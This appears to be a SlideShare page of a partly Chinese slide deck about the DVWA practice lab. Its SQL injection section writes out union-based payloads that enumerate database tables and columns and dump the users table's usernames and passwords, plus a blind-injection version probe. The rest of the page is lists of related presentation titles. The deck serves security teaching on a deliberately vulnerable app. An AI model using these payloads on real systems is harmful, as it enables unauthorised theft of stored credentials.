SlideShare a Scribd company logo
DVWA - Damn Vulnerable Web
Application
Dvwa low level
1.Brute Force
2.Command Injection
3.CSRF
4.File Inclusion
5.SQL Injection
SQL Injection Source
SQL 重組
$getid = "SELECT first_name, last_name FROM users WHERE user_id =
'$id'";
檢測是否有錯誤
1' and 1=1#
組合後變成
"select first_name,last_name form users where user_id = '1' and 1=1#";
5.SQL Injection
1' order by 1#
1' union all select 1,2#
1' union all select user(),database()#
1' union all select null,table_name from information_schema.tables#
1' union all select null,table_name from information_schema.tables where
table_schema = 'dvwa'#
1' union all select null,column_name from information_schema.columns where
table_schema ='dvwa'#
5.SQL Injection
1' union all select user,password from users#
6.Blind SQL Injection
差別
6.Blind SQL Injection
我們可以先
檢測版本
1' union all select null,substring(@@version,1,1)=4#
7.File Upload
8.Reflected Cross Site Scripting (XSS)
9.Stored Cross Site Scripting (XSS)
Dvwa medium level
To be continue
vance@hst.tw

More Related Content

PPTX
Vulnerabilities in modern web applications
PDF
How to identify and prevent SQL injection
PDF
certified-ethical-hacker-cehv12_course_content.pdf
PPTX
DVWA(Damn Vulnerabilities Web Application)
PPTX
Cross Site Request Forgery (CSRF) Scripting Explained
PPTX
Xss attack
PPTX
Web application attacks
Vulnerabilities in modern web applications
How to identify and prevent SQL injection
certified-ethical-hacker-cehv12_course_content.pdf
DVWA(Damn Vulnerabilities Web Application)
Cross Site Request Forgery (CSRF) Scripting Explained
Xss attack
Web application attacks

What's hot (20)

PPT
Secure code practices
PDF
CNIT 126: 10: Kernel Debugging with WinDbg
PPTX
Sql injection in cybersecurity
PDF
Privilege escalation from 1 to 0 Workshop
PPT
A Brief Introduction in SQL Injection
PDF
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
PPTX
Server-side template injection- Slides
PPTX
Sql injection
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
PDF
Web App Security Presentation by Ryan Holland - 05-31-2017
PPTX
Command injection
PPTX
Sql Injection
PPT
Introduction to Web Application Penetration Testing
PPTX
Understanding Cross-site Request Forgery
PPTX
Introduction to penetration testing
PPTX
API Security Fundamentals
PPTX
Understanding NMAP
PDF
Broken access controls
PPTX
OWASP Top 10 2021 Presentation (Jul 2022)
Secure code practices
CNIT 126: 10: Kernel Debugging with WinDbg
Sql injection in cybersecurity
Privilege escalation from 1 to 0 Workshop
A Brief Introduction in SQL Injection
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
Server-side template injection- Slides
Sql injection
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Web App Security Presentation by Ryan Holland - 05-31-2017
Command injection
Sql Injection
Introduction to Web Application Penetration Testing
Understanding Cross-site Request Forgery
Introduction to penetration testing
API Security Fundamentals
Understanding NMAP
Broken access controls
OWASP Top 10 2021 Presentation (Jul 2022)
Ad

Viewers also liked (20)

PDF
新手無痛入門Apk逆向
PDF
Python 網頁爬蟲由淺入淺
PDF
Rootkit 101
PDF
Web2.0 attack and defence
PDF
Webshell 簡單應用
PDF
Algo/Crypto about CTF
PDF
ROP 輕鬆談
PDF
Android Security Development
PDF
Crawler
PDF
SQL injection duplicate error principle
PPT
Php lfi rfi掃盲大補帖
PDF
cmd injection
PDF
調試器原理與架構
PDF
SITCON2016, 防毒擋不住?勒索軟體猖獗與實作
PDF
防毒擋不住?勒索病毒猖獗與實作
PDF
Antivirus Bypass
PDF
在開始工作以前,我以為我會寫扣。
PPT
4226 4228 台南安平new
PDF
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
PPTX
Breakpoints
新手無痛入門Apk逆向
Python 網頁爬蟲由淺入淺
Rootkit 101
Web2.0 attack and defence
Webshell 簡單應用
Algo/Crypto about CTF
ROP 輕鬆談
Android Security Development
Crawler
SQL injection duplicate error principle
Php lfi rfi掃盲大補帖
cmd injection
調試器原理與架構
SITCON2016, 防毒擋不住?勒索軟體猖獗與實作
防毒擋不住?勒索病毒猖獗與實作
Antivirus Bypass
在開始工作以前,我以為我會寫扣。
4226 4228 台南安平new
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Breakpoints
Ad

Recently uploaded (20)

PDF
Review of recent advances in non-invasive hemoglobin estimation
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
KodekX | Application Modernization Development
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PPTX
sap open course for s4hana steps from ECC to s4
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PPTX
MYSQL Presentation for SQL database connectivity
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
Encapsulation theory and applications.pdf
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PPTX
Big Data Technologies - Introduction.pptx
PPT
Teaching material agriculture food technology
Review of recent advances in non-invasive hemoglobin estimation
20250228 LYD VKU AI Blended-Learning.pptx
KodekX | Application Modernization Development
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
“AI and Expert System Decision Support & Business Intelligence Systems”
sap open course for s4hana steps from ECC to s4
Mobile App Security Testing_ A Comprehensive Guide.pdf
MYSQL Presentation for SQL database connectivity
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Encapsulation_ Review paper, used for researhc scholars
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Building Integrated photovoltaic BIPV_UPV.pdf
Encapsulation theory and applications.pdf
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Understanding_Digital_Forensics_Presentation.pptx
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Big Data Technologies - Introduction.pptx
Teaching material agriculture food technology

Dvwa low level